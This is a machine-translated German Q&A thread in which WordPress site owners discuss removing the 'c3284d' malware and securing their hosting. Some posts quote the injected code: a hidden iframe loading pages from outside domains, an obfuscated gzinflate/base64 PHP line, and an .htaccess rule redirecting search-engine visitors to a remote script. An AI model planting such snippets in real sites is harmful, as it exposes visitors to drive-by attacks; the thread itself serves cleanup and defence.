1. Zuhause
  2. Frage und Antwort
  3. Website iframe attack - fügt Code in die Quelle ein

Website iframe attack - fügt Code in die Quelle ein

2012-07-11 22 views
6

In den letzten Tagen war meine Website wiederholt Ziel eines Iframe-Angriffs. Der Code wird hauptsächlich an PHP- und Javascript-Seiten angehängt. Der Code ist dann 64 PHP Basis codiert, siehe Beispiel (ich habe den Code leicht geändert, es zu neutralisieren):Website iframe attack - fügt Code in die Quelle ein

<script type="text/javascript"> 
    document.write(
     '<iframe src="http://opticmoxie.com/xxxxxxx.php"  
     name="Twitter" scrolling="auto" frameborder="no" 
     align="center" height="2" width="2"></iframe>' 
    );

The:

#c3284d# 
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L"))); 
#/c3284d#

Diese entschlüsselten etwa wie folgt aussieht Eine Sache ist gemeinsam, dass der gesamte Code den Kommentar "# c3284d #" enthält, damit das Aufspüren von bösartigem Code nicht schwierig ist. Aber es ist zeitaufwendig ...

Wir sind auf einem gemeinsamen Server in Gradwell (UK) und sie waren nicht besonders hilfreich. Die Frage ist also, was kann ich tun, um dieses Problem von sich selbst zu wiederholen? Ich kenne MySQL-Injection-Angriffe und verwende PHPs mysql_real_escape_string, um solche Angriffe zu verhindern.

Die Seite ist PHP und MySQL-Laufwerk. Wir verwenden MySQLFTP und haben einen Shell-Account für den SSH-Zugriff. Wir verwenden Wordpress (das neueste Update mit deaktivierten Plugins).

Quelle

2012-07-11 monkey64

+1

Es gibt eine Menge von PHP-Lore, die über diese Art von Frage existiert, und ich ermutige Sie, danach zu suchen.Jedoch ist die Querdenker-Antwort auf diese Frage "[Verwenden Sie etwas anderes als PHP.] (http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)" PHP ist anfälliger für Sicherheitsprobleme als andere Sprachen –

+1

Eine alte Frage, aber es lohnt sich, diesen Punkt zu erwähnen: Holen Sie sich einen Hash-Scanner und installieren Sie ihn in Ihrem Konto, es gibt eine ganze Menge in PHP, von dem ich kann sagen. Diese verwenden cron, um zu prüfen, welche Dateien neu sind oder sich geändert haben, und können Ihnen eine E-Mail senden, wenn verdächtige Änderungen gefunden werden. – halfer

Antwort

0

Ich habe auch das gleiche Problem. In meinem Fall die beigefügten Code

<!--c3284d--><script type="text/javascript"> 
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); 
</script><!--/c3284d-->

Zusätzlich ist, gibt es eine .htaccess-Datei wie folgt: http://www.webmasterworld.com/html/4472821.htm und http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

Hoffnung:

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} 
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) 
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php 
> [R=301,L] </IfModule> 
> #/c3284d#

ich zwei Artikel zu diesem Thema gefunden es hilft

Quelle

2012-07-11 17:56:33 Thang

+1

Kurz nachdem ich diesen Beitrag geschrieben hatte, wurde ich erneut von der Malware angegriffen. Seitdem ich meine FTP-, SSH- und MySQL-Passwörter geändert habe, habe ich keine weiteren Probleme. Ich stimme dem Artikel zu. Shared Hosting verursacht nur Probleme. Habe jetzt einen Virtual Private Server Account eröffnet. – monkey64

1

Ich hatte das gleiche Problem. Die Zugriffsprotokolle des FTP-Servers zeigten, dass die Änderungen mit einem gehackten FTP-Passwort vorgenommen wurden.

Quelle

2012-07-14 17:46:28 abaumg

1

Ich habe das gleiche Problem und Varianten von verschiedenen gehackten Dateien auf vielen verschiedenen Domänen. Das einzige, was mir auffällt, ist Wordpress. Wir haben WordPress auf vielen dieser Server und ich denke, das ist der Übeltäter. Ich habe alle meine wordpress-Accounts aktualisiert, alle pwords für alle Domain-Accounts geändert. nicht sicher, ob das Problem noch vollständig gelöst ist.

Quelle

2012-07-19 22:07:19 Larry

1

Ich hatte das gleiche Problem, aber in eine Wordpress-Website.

Ich vermute, die Website wurde durch die Widgets infiziert, weil ich ein Plugin verwende, mit dem PHP-Code ausgeführt werden kann.

Meine beste Lösung war:

  • das verdächtige Widget beseitigen;
  • sehen Sie die Uhrzeit und das Datum einer infizierten Datei (mein Fall: header.php);
  • löschen Sie alle infizierten Dateien (in meinem Fall habe ich eine Sicherungskopie der Website);
  • Suche in der Protokolldatei für verdächtige IPs zu dieser Zeit (Suche ermittelte IPs auf Blacklists);
  • Installieren Sie ein Plugin, um verdächtige IPs zu verbieten.

Von diesem Moment an war das Problem verschwunden. Ich hoffe, dies wird dir helfen.

Quelle

2012-07-27 14:36:48 Mario

1

Hatte das gleiche Problem auf allen Wordpress-Sites, die ich verwaltet. Ich habe nicht die Quelle der Infektion gefunden, ich wette, dass es ein paar Wurm auf meinem Computer oder es ist ein Plugin, das ich auf allen Seiten installiert habe.

Ich fand alle Dateien, die in WP geändert wurden - Bessere Sicherheits-Plugin-Protokolle und gelöscht zusätzlichen infizierten Code und nachdem ich Chmod 444 auf alle Dateien, die Quelle der Infektion waren.

Jetzt im freien seit 1 Monat von bösen iframes/htacess und anderen Sachen.

Quelle

2012-12-21 21:45:35 Lukas

1

Ich hatte das gleiche Problem und fand, dass die Methode, die sie verwendeten, ein gehacktes FTP-Passwort war.

Obwohl dies auf einem cPanel-Server mit aktiviertem CPHulk-Brute-Force-Schutz ausgeführt wird, stellte ich fest, dass die Hacker versuchten, sich ihren Weg über Tausende von kompromittierten Hosts zu erzwingen.

Glücklicherweise hatte ich ein Protokoll aller Dateien, die hochgeladen wurden, also schrieb ich ein Skript, um diese Dateien aus Sicherungen wiederherzustellen.

Ich habe dann die cPanel Brute-Force-Schutzstufen erhöht, indem ich die Anzahl der fehlgeschlagenen Versuche reduziert habe, bevor das Konto gesperrt wird.

Quelle

2013-02-14 00:47:48 Rabbie

-1

böse Jungs haben Zugriff auf Ihren Code, so dass Sie ihren Zugriff schließen müssen, in der Zwischenzeit können Sie ein einfaches Skript verwenden, überprüfen und löschen Sie alle Zeilen, wo es erkennt gzinflate (base64_decode, aber auch den besten Code (Prüfsumme Checker) mit Backup-Dateien) wird nutzlos sein, wenn sie immer noch Zugriff haben

Quelle

2014-12-12 16:35:02 Nemesis

Verwandte Themen

 Verwandte Themen